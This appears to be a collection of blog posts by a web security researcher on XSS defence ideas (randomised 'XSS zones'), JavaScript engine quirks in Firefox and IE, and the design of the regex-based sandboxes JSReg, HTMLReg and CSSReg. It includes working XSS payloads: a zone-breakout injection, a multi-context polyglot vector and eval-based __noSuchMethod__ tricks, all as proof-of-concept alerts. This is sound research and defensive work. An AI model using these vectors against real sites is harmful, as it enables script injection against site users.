XSS Zones

One of the impossible problems of the web is how do you protect against site that has a persistent XSS hole yet requires JavaScript to function. I thought about this for a while and worked out you could create a XSS zone where you expect user input. Declaring a zone is tricky because if you have a start and end marker the attacker can manipulate that with their markup and break out of the zone.

Lets take a look at some code as a reference:-

<!-- Begin XSS zone -->
Hello I am a twitter..I mean webgoat
<!-- End XSS zone -->

So we define a XSS zone where we allow untrusted input. The idea of the zone is that JavaScript, events, css is locked down or disabled stopping the worm or evil input from spreading or cause information disclosure. But now the attacker has a new string to inject <!– End XSS zone –><img src=1 onerror=alert(1)> and they have broken out of the zone.

The solution to this problem is to randomize the zone name:-

<!-- Begin XSS zone 9cb3c2fd7ef861d762471c90de049603806e315eea3daf
13e0b8faadd6b9e85db09afeab9430d8f58d1f7e8551745
ec3f3961be932b79247f56c12db5c7e2e8d -->
Evil content
<!-- End XSS zone 9cb3c2fd7ef861d762471c90de049603806e315eea3daf13e0b8f
aadd6b9e85db09afeab9430d8f58d1f7e8551745
ec3f3961be932b79247f56c12db5c7e2e8d -->

Before the HTML is rendered the browser looks for XSS zone name, when it finds the first zone name it continues parsing the HTML until the matched ending zone is found. Any existing zones inside are ignored. The randomization of the zone name is generated on every request and are removed from the markup before render.

XSS zones would require a inbuilt JavaScript/HTML/CSS sandbox which would only allow harmless markup. Any input that is accepted from the user would have to be declared with a XSS zone and the feature would have a OFF/ON switch somewhere maybe HTTP header. The zones themselves could have a simple configurable attributes e.g. javascript=false css=false html=true urls=sameorigin.

Defining a zone could be done manually by generating a random name and outputting the HTML comment or the server side language could detect where variables are used and output the zone names automatically. Using HTML comments is interesting because they act as both a HTML and JavaScript comment enabling nice fallback.

One final way to enable XSS zones would be using the browser itself similar how Firebug and IE developer toolbar allow you to select DIVs and other elements, the advanced user could select an area of a site that they determine requires a XSS zone. The browser would then monitor this section of the site and automatically add a random XSS zone to the markup.

Configuration of zones

Zones should always follow the format of <!– Begin XSS zone RANDOMKEY CONFIGURATION_DATA –> and end with <!– End XSS zone RANDOMKEY –>

The configuration should be simple and precise. The following commands should be supported.
javascript=no|yes|domains*
css=no|yes|domains*
urls=sameorigin|domains|proxied*

* Domain list should be a whitelist only, no global wildcards allowed.
* Proxied should place all urls through a proxied service that obtains the image data or follows a link without sending cookie information and pre checked with a malware scanner.

That was the basis of my idea, if you like it implement it.

One vector to rule them all

I set myself a fun challenge to create a vector that would execute in many contexts. The idea being that it should work regardless where it’s placed. For example:-

"xss"
'xss'
<tag alt="xss">

As an added challenge I tried to execute only the one payload and where possible to use a single eval. I had to use multiple evals as the contexts increased because for stuff like background= etc there was no way I could figure reusing the existing one :( So I had around 19 then got bored.

One vector to xss them all, one vector to find them,
One vector to bring them all and in the darkness bind them.


javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=/alert(1)/.source]<img -/style=a:expression&#40&#47&#42'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>"

Updated added new vectors and removed any that weren’t required. Thanks to @LeverOne!!

2nd Update…Fixed comments, added name to [] rule so it executes without window.name for dom rules. Thanks again for some fixes by @LeverOne

Function is the new window

I discovered while reading some Firefox code that E4X allows you to call standard functions by using the special namespace. This is cool! We can now define setters etc on the XML prototype and call functions on E4X objects. It looks like this:-

<></>.function::toString();

Would Firefox be crazy enough to include this special namespace on all objects? Well they made the decision to include E4X methods on every object so I guess there’s no reason that it wouldn’t be included on window, it is the global object after all that means…..

function::['alert'](1)//mario discovered this :)

Yes that is why “function” is the new window. But it doesn’t finish here oh no it gets even better Yosuke Hasegawa found some “magic strings”. That means accessing the namespace once will be persisted throughout the browser session. Just reading a property is enough to trigger a magic string. The following syntax is perfectly valid in Firefox you crazy cats.

<></>.function::['x'];//required once in a browser session
$="@mozilla.org/js/function";_="alert";$::[_](1)

I’d like to thank my fellow crazy JavaScript slackers:- Yosuke Hasegawa, Jonas Magazinius and Mario Heiderich for making Firefox appear nuts.

* Disclaimer if your sandbox breaks with the above code consider writing a better sandbox.

setTimeout and setInterval

Not posted for a while and you may have missed this on twitter.

setTimeout("MsgBox 1",0,'VBS');

Cool so setTimeout supports vbscript as an argument. Yeah I can read MSDN :) but JScript.Encode!!! Yet another place. I wonder what else remains undiscovered….

setTimeout("#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@",0,'JScript.Encode');
setInterval("#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@",0,'JScript.Encode');

Setters using VBS and constant hacks

I wasn’t gonna blog this because I couldn’t be bothered but Mario asked me if I had it documented anywhere and I guess it’s nice to have it somewhere. So I was looking to create setters in legacy browsers like IE7 and it would be nice to use them on custom objects in IE8. I came up with the following VBS hack:-

execScript("Class c\nProperty Let x(y)\nalert(y)\nEnd Property\nEnd Class\nSet obj=new c","VBScript");obj.x=1;//yeah js calls vbs ;)

Pretty cool calling VBS from JS then using a VBS object inside JS :)

Ok and now some constant stuff I tweeted before but I quite like so I’ll post here too. Constants are weird in JavaScript, when you think about them you think in a value that cannot change but when it comes to objects they can’t be constants for some reason. I dunno why they could be implemented quite easily by creating a Getter only object but anyway:-

//example1
const x={};x.y=123;alert(x.y)//Objects aren't constants!

//example2 (need to run separately of course
const x={};x.toString=x.valueOf=function() { return 1; };alert(x)

Finally I’ll leave you with a quiz, what is “x” equal to without running?:-

var x=1; function y() { x=3; alert(x); return; const x=2;}y()// x == ?

Sandboxed DOM API

Description

I finally sat down and started work on a sandboxed DOM API. Originally I was just going to develop a new framework because the DOM is messy but instead I decided it would be cool to have a safe simulated DOM instead and build a framework on top of that.

It isn’t complete yet and there’s still a lot of work to do but it’s working pretty good. I still need to run some tests on it and try to break it but I don’t have time at the moment as I need to do other stuff.

One of the problems making a DOM API is that IE doesn’t have setter support even in IE8 it doesn’t allow you to define setters on normal objects. Because I spend most of my time hacking stuff it was a fun challenge to make IE support setters on DOM objects and keep my sandboxed whitelists.

It’s quite complicated and quite ugly in parts but it works and I think it’s the only way to support legacy browsers like IE7.

How it works

I have to test for the various setter support including defineSetter, Object.defineProperty and revert to the legacy onpropertychange. Object.defineProperty works fine in IE8 when using a DOM object but I encountered problems when I needed to assign to a sandboxed normal object. Here it gets ugly, I had to create a DOM object for any styles used by a node, this way both Object.defineProperty and onpropertychange allow me to monitor any assignments to the fake style object.

var styles = document.createElement('span');
node.$style$ = styles;
Object.defineProperty(node.$style$, '$'+cssProp+'$', {});
document.getElementById('styleObjs').appendChild(styles);
node.$style$ = styles;
node.$style$.onpropertychange = function(){}

As you can see with the code sample above I have to append the fake style DOM object for onpropertychange otherwise it won’t be called on assignments.

You can see this working by using the following test code:-

document.getElementById('x').style.color='#ccc';

So I proxy off all these functions and make the root node any HTML object, I use CSSReg and HTMLReg to sandbox each modification to a property. Finally where it got complicated was supporting events, currently I only support “onclick” as I’m still testing but what happens is because the code is already sandboxed I don’t need to perform a rewrite so I pass this to JSReg as it’s already been converted, I supply the “this” object as the HTML element this allows the triggered event to call “this” as the current element.

That’s it! I’ve donated the code to OWASP and it will be free to use in your projects, any help testing or suggestions are most welcome, enjoy the demo!

Sandboxed DOM API

Astalanumerator 0.7

Just a quick post to let you know I’ve updated Astalanumerator in case you use it somewhere. I use codeplex to host it as I thought I’d give it a whirl as I’ve seen other people host their projects and it looks decent.

This version contains various CSS fixes and tracks each object within links and via the astalanumerator object, this was quite tricky because I allow stuff like “/a/” etc and because you can click many different properties it’s hard to keep track of each of them. Each click now jumps you straight to the list of props for that object instead of just showing you in the url. The object are colour coded now and the inspector fills the screen. You should notice it’s much faster than the original one and it inspects properties using three methods, 1. A normal for..in loop. 2. A manual list of props I’ve collected 3. Using the IE enumerator object. Enjoy!

Source code
New version
Old version

Can all mozilla people look away now please

Custom setters syntax are being removed from Firefox in the next version.. boo I here you say well at least some of you. If you don’t know Firefox decided it would create it’s own setter syntax (I love it when you do that you know) ages ago and it looked something like this:-

a setter=alert,a=1//calls alert(1)

Whacky indeed. They decided to remove it. So I was messing with JavaScript like I do near enough every day and I stumbled upon this:-

Object.prototype.__noSuchMethod__=function(s){ alert(s); };
1..*(1)

What was surprising was that “alert” returned “*” not 1 as you would expect. The crazyness then continued:-

Object.prototype.__noSuchMethod__=function(s){ eval(s); };1.['alert(1)']()

Not looking at MDC and still not understanding why this was happening Mario pointed out “oh it’s sending the name of the function via the noSuchMethod” then big doh moment oh yeah. But then that means…..we have a new setter syntax!!!!

//existing code
function x(s) {
  eval(s);
}
//our evil injection
Object.prototype.__noSuchMethod__=x;new/a/['alert(1)']

If you work at Mozilla please look away now because I like this crazy syntax so don’t fix it.

Hackvertor Ajax applications

I hate to use the word Ajax because there’s no XML involved just nice JSON but Hackvertor now has Ajax applications! At the moment it’s very rough around the edges but it will improve when I get more spare time to work on them. What does it mean? Well you can now share actual HTML/JS based applications on Hackvertor based on your own code and store/load data. Each time you create a tag inside the applications category it automatically gets added to the applications section. The app can then be in the list when clicking on the navigation.

How to create a HV app

It’s slightly different than creating a tag, apps use a object to contain the mini site. This way you can write a forum in less than 100 lines :) The best practice way I came up with was to use a anon closure, which contains a user variable to get info about the current user. Then each section is split into a different property of the site object. The object doesn’t need to be called site but I thought it was handy to think of it that way.

There are two special properties of the “site” object. They are home this is required in order to run your application and returns the first page the user sees. Second is styles this allows you to style all of your app in one place. All HTML/CSS is controlled by HTMLReg and CSSReg, JavaScript is handled by JSReg.

To see how it works you can see a very simple/bad app I wrote quickly:-
Forum sample code
Forum demo

You can call each sections of your app by using # urls. For example lets say you wanted to call the “Cancel” function of your “site” object. All you need to do is create a url with #Cancel. Arguments can be sent to your functions in links by using “?” for example if you look at the forum, I use #topic?0 to pass the id number to the topic function. This also works nicely with forms, you just give a submit button a value of your site function and it will automatically gather all the form values and send a object with them all referenced. To see how this works in the forum app, just take a look at the Save section. Here is how to submit button calls it:-

<input type="submit" value="Save" />

Hackvertor automatically scans all inputs/links and adds a onclick handler to call your function named in the value attribute or the location.hash of the link. The above HTML actually does something like this:-

<input type="submit" value="Save"  onclick="site.Save(this.form)" />

Limitations

I need to write a DOM layer to allow sandboxed assignments to CSS and HTML attributes. At the moment this makes apps pretty restrictive but you could write a IM application or shared messaging app. This means stuff like document.getElementById won’t work or custom event handlers. You are also limited what kind of HTML/CSS can be executed using the sandboxes. There are browser bugs too :( I’ve not tested it fully yet.

App API functions

getUser() – Returns an object of the current user. The properties include: userID, username, image. Image will only be returned if a user has a picture uploaded.

loadStorage((string) appID, (int) id) – Loads a JSON string. AppID is the application name, id is a number used to refer to a section such as a forum topic.

saveStorage((string) appID, (int) id, (string) JSON, insert|update) – Saves a JSON string. AppID is the application name, id is a number used to refer to a section such as a forum topic. JSON is a string of JSON data you want to store. The last param inserts or updates the JSON data, it uses the userID of the user to check permissions.

Regular expression sandboxing

Birth of the regex sandbox

I decided today to do a proper blog post to explain my reasons for creating regex sandboxes. I don’t often write a lot of words on this blog partly because I’m not very good a making long meaningful sentences and partly because I think the point can often be made in less words. Hopefully this will be useful for someone writing filters.

First off a quote “You can’t parse [X]HTML with regex. Because HTML can’t be parsed by regex. Regex is not a tool that can be used to correctly parse HTML” from (stackoverflow). I agree with the comment it isn’t possible to fully parse HTML with regexes but my goal wasn’t to do that, I wanted to parse a safe form of HTML. I also have a uncontrollable urge to do something that people say can’t be done.

Now we have that out of the way, how did this all begin? Well I was building a char by char JavaScript parser inside JavaScript to allow untrusted code to be executed. Every time I wrote a simple string matching function I found myself making shortcuts and using regexes instead. For example why loop through all characters when you can whitelist the desired ones? I soon found that I had a great advantage of using regexes instead of parsing every character, because I could use the native JavaScript engine to help me.

This lead me to develop JSReg [1], at first it seemed very easy to match JavaScript, the numbers were pretty easy and strings but I then encountered one of the first problems of regex sandboxes. It is very difficult to match something that is matching itself, for example an array can contain pretty much any JavaScript statement and itself but if you are defining it how can you match it? I didn’t really have an answer to this, one of my solutions to this problem was to create a recursive regex that created a second compiler to match inside the first match and so on. But this was slow and because JavaScript doesn’t have lookbehind previous matches would eat characters in the next match (I’ll talk more about this in the design). My other idea was to use backreferences but these are very difficult to track when using multiple regexes and they only return a successful match in my tests it wasn’t possible to produce a perfect array match using backreferences. I could be wrong of course I know I’m not perfect.

The design

My basis of my design was to not rely on 3rd party code were possible that means no jquery etc, in addition I should employ multiple layers of security wherever possible. These were good design decisions. Throughout initial testing the multiple layers proved difficult to break down. For JSReg the first layer was an iframe, the iframe was created each time of execution enabling fresh prototypes and a throw away box once execution had finished. Then I whitelisted the entire JavaScript objects/properties, this was done by forcing all methods to use suffix/prefix of “$”. Each variable assignment was then localized using var to force local variables. Each object was also checked to ensure it didn’t contain a window reference.

Javascript arrays proved tricky as mentioned earlier because of the amount of code that can be included within them, initially I decided to try and match them and their contents. But there were several performance problems of matching all that code and JavaScript regex limitations. For example I use one regex with a replace function to globally match each sequence using groups, the idea is to match all the valid objects first. In the instance of an array you’d first match all regex objects, strings etc because they can contain a “[" and "]” then once all valid objects have been enumerated by the regex engine it will encounter the first “[" of our array.

This works well in practice for every object apart from arrays. In JavaScript the array literal shares the same syntax as the object accessor. Therefore you have to identify the difference between an array or object. Sounds easy?

[][0[0,0[0]]];
+[][0[0,0[0]]];
{}['I am an array']
~{a:0}['I am a object accessor']

As you can see with the samples above, you'd have to match the entire js syntax before the opening "[". Then if you don't match the entire sequence inside the array you won't know if the ending "]" is part of an array sequence or object. This problem was unsolved for a long time. The main reason was in order to protect against window references I rewrite object accessors like obj['abc'] to obj[JSREG_FUNC.gp('abc')] so the function returns a safe string which uses the prefix/suffix of $ e.g. abc becomes $abc$. Because a string is returned of the expression it would break an array if it wasn't detected.

Detecting an array or object was difficult because of the design too, you see if a regex object is matched like /abc/ and is followed by a object accessor like /abc/['source'] the previous expression is eaten by the parser so the next match is effectively ['source'] which JSReg understandably thinks is an array. A simple way round this would be to lookbehind to see if a whitelist of characters make the opening "[" an array or not. But JavaScript doesn't support lookbehinds! :(

The simple workaround was to use Array(1,2,3) instead for arrays and assume all "[" and "]" were not arrays. This worked but it breaks existing code. Finally after many attempts I think I've come up with a solution. I store a list of previous matches and rewrite all array literals and object accessors into a function or method. This means I no longer need to detect the ending of the array as they both have a ")" instead of a "]". Easily demonstrated with a code example:-

[1,2,3] //becomes:-
A(Number(1),Number(2),Number(3))

window['x']//becomes:-
$window$.JSREG_PROP('x')

Finally as part of the design I check the JavaScript syntax before and after conversion this provides another layer of security if the rewrite fails at any part of matching the code.

The code

JavaScript is difficult to match but I found HTML/CSS easier. At first I started the code for HTMLReg [2] and CSSReg [3] in a similar way to JSReg. Then I realized when hacking my own code how I could make it better to defend against attack. First off I employed a strict whitelist to remove any partial open HTML attacks and evil attributes that were obvious attacks. This means I didn't stick to the HTML specification, I don't allow any junk in attributes. For example if you want to include "<" or ">" inside a title attribute then you have to encode it. I may allow them in future if it can be proven safe but I'd rather not fight something I can't win. You may disagree with what I've just said but your filter is probably being pwnd right now.

Once I had my whitelist of tags and attributes I constructed RegExes for any individual parts I wanted to match. For example text nodes, invalid tags and valid attributes, these would be nicely chained together in one big regex. Then each part is grouped so that you can match each expression and validate it.

Here is how it works:-

html.replace(mainRegExp, function($0, $styleTag, $tag, $text, $invalidTags) {}

Notice how I use the replace function, I don't do html = html.replace because I only want to match the text in my regexes. I prefer to use replace because I have a nice reference to each group like this automatically with local variables. This was a lesson I learned from developing JSReg as if the replace fails it will return your plain code rather than rewrite it.

Inside the function I include a couple of things in each block I'll use the text node as an example:-

if($text !== undefined && $text.length) {
output += $text;
parseTree+='text('+$text+')\n';
}

Here if the text node is matched it adds it to the output. Parse tree is a nice way of keeping track of what you've matched. It's a useful debugging reference. The if statement is required because of browser inconsistencies when matching groups.

In the case of HTMLReg for performance reasons I have a whitelist to match a general tag, then inspect it further so I'm only matching a smaller amount of text. You can see that with the following code:-

if($tag !== undefined && $tag.length) {
  if(!new RegExp('^<\\\/?'+allowedTags.source+'[\\s>]','i').test($tag)) {
	return '';
 }
parseTree+='tag('+$tag+')\n';
if(!/^<\/?[a-z0-9]+>$/i.test($tag)) {
  $tag = parseAttrValues($tag);
}
output += $tag;
}

Once my tag has been matched I then start to parse attributes, I do this by creating a hidden div and reading it's contents. This is cool for a number of reasons, we can read what the browser reads and our code automatically gets formatted. Because we then use the DOM it means our entities will be decoded for us. While testing I found that JavaScript won't be executed using innerHTML without certain tags or attributes, if I whitelist the tags and attributes then I can use the innerHTML safely without having to worry about execution. I have a backup plan if this fails, I could be more strict with certain attributes if it's possible to execute code.

Onto CSSReg! It didn't exist nor did I think it was needed as I thought I could rely on the browser to ensure multiple CSS rules didn't cross over from single CSS dom rules. I was wrong. It was proven by many talented researchers (mentioned in the thanks section) that it wasn't possible to get the browsers to rewrite CSS safely. I had to write another regex sandbox. This time it wasn't as tricky as first appeared. As long as I didn't try to follow the madness of the specification again I should be able to produce some CSS that was safe from malicious code yet is useful enough to use.

First off I gathered a list of properties and identifiers, I removed crappy browser specific extensions yeah they are bad. ALL OF THEM. Then I used the same method of HTMLReg to match each part, the trickiest part this time was urls. There are so many ways to escape a css url in every browser, you have to handle backslash escapes, entities, new lines and backslash hex escapes. The best way I came up with was to whitelist the url first, match everything in-between () and then decode and escape every character that didn't match the whitelist.

This made it pretty safe across multiple browsers. But there was a problem, some browsers decoded the CSS even when it was sandboxed correctly e.g. one attack I found was to triple encode the character and the browser would decode the entities and escapes until it produced it's mangled version of CSS which broke the sandbox. To get round this I created a custom attribute which didn't match my whitelist "sandbox-style" this allowed CSSReg to store it's correctly sandboxed style, I used a custom attribute outside of the whitelist to prevent injections of sandbox-style. Once my CSS was stored correctly I could then match it again and rename it back to style which was then returned correctly.

All this trouble was because I wanted the browser to handle invalid HTML for me, any unclosed HTML tags would be automatically closed by the browser engine for me :)

Finally in order to handle selectors I stuck to very simple syntax, either #someid or .someclass and allowed multiple like .someclass1, someclass2 {} this prevents CSS injection based attacks and well as making it easy to parse. Once each selector was matched I restrict which tags are allowed and prefix a application ID to prevent HTML/CSS crossing across sandboxes. I then check if a selector is matched before opening or closing one.

I hope you've enjoyed this post as it's a break from what I normally do but I thought it would be worth the effort to get together as I've found some of the concepts the best way to code a solution and hopefully you'll find it useful.

Thanks

I would like to thank Dave Ross as I was heavily inspired by him especially with the multiple regex references chained together. Eduardo Vela aka "sirdarckcat" for his awesome (?:HTML|JS|CSS)Reg hacks. Juriy Zaytsev aka "kangax" for his excellent input in detecting parsing flaws with JSReg. Kyo for breaking things without even trying. Theharmonyguy for breaking HTMLReg classes and spotting comical spelling mistakes by me. LeverOne for breaking HTMLReg and CSSReg with some quite simply awesome and evil vectors. Mario Heiderich aka ".mario" for making regex objects look insane and provide great input for JSReg and breaking HTMLReg. David Lindsay aka "Thornmaker" finding JSReg parsing errors with ternary operators. Stefano Di Paola for smashing the JSReg stack and proving that non-mortals exist. Achim Hoffmann for providing valuable JSReg input and everyone else who has helped me test and develop JSReg & others.

[1] JSReg
[2] HTMLReg
[3] CSSReg